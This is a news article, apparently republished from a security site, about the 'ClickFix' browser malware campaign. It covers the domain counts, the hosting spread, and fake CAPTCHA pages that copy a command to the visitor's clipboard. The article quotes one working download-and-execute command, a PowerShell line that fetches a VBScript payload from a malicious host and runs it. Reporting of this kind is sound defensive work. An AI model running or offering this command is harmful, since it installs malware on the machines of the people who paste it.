Surge in Browser-Based Malware Campaign: ClickFix
In the middle of 2025, researchers from Lab539 identified a significant escalation in a novel browser-based malware initiative named “ClickFix.”
First surfacing in July, this threat quickly broadened its influence by registering over 13,000 distinct domains, each designed to entice users into executing harmful commands on their devices.
The campaign exploits compromised or low-cost hosting solutions, with a substantial fraction operating behind Cloudflare, to deliver payloads through deceptively innocuous web prompts.
Individuals visiting these malicious sites encounter a CAPTCHA challenge before being coerced into executing a command copied to their clipboard, thereby granting attackers the capacity to deploy arbitrary scripts or executables.
Initially, the proliferation of ClickFix domains appeared rather insignificant in the expansive landscape of cyber threats.
However, as of mid-August, an alarming increase caught the attention of numerous threat-intelligence platforms.
Lab539 analysts reported a sudden emergence of front-end sites that obscure malware delivery under the guise of “verification” processes, a feature that sets ClickFix apart from traditional phishing or watering-hole attacks.
The extensive domain registrations implied an automated provisioning process, likely fueled by pay-as-you-go registrar services and resold hosting, as opposed to the manual configurations typically seen with advanced persistent threat actors.
Despite Cloudflare’s significant role, accounting for approximately 24% of the identified ClickFix domains, the campaign’s extensive range includes nearly 500 alternative providers, highlighting a strategic diversification of infrastructure to bypass simplistic blocklists.
Notably, regional VPS services from the United States, Germany, Indonesia, and Brazil have been prominently featured, indicating both global outreach and opportunistic compromises of third-party servers.
In many instances, attackers have repurposed outdated or improperly configured subdomains—some linked to decades-old academic or municipal hosts—to merge malicious traffic with legitimate DNS records.
Infection Mechanism and Payload Delivery
The primary infection mechanism capitalizes on the browser’s clipboard API, surreptitiously inserting a command that users inadvertently paste into a terminal.
Upon CAPTCHA completion, the site transcribes a PowerShell command sequence to the clipboard. For instance:
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbsThis single command line downloads and executes a VBScript payload without requiring any additional user interaction, illustrating the campaign’s reliance on social engineering over complex exploitation.
Variants include direct executable downloads and obfuscated scripts, indicating multiple operators leveraging the ClickFix framework.
The prevalence of this method underscores how minimal technical expertise can still result in vast intrusion opportunities when combined with automated domain registration and global hosting resources.
Source link: Cybersecuritynews.com.
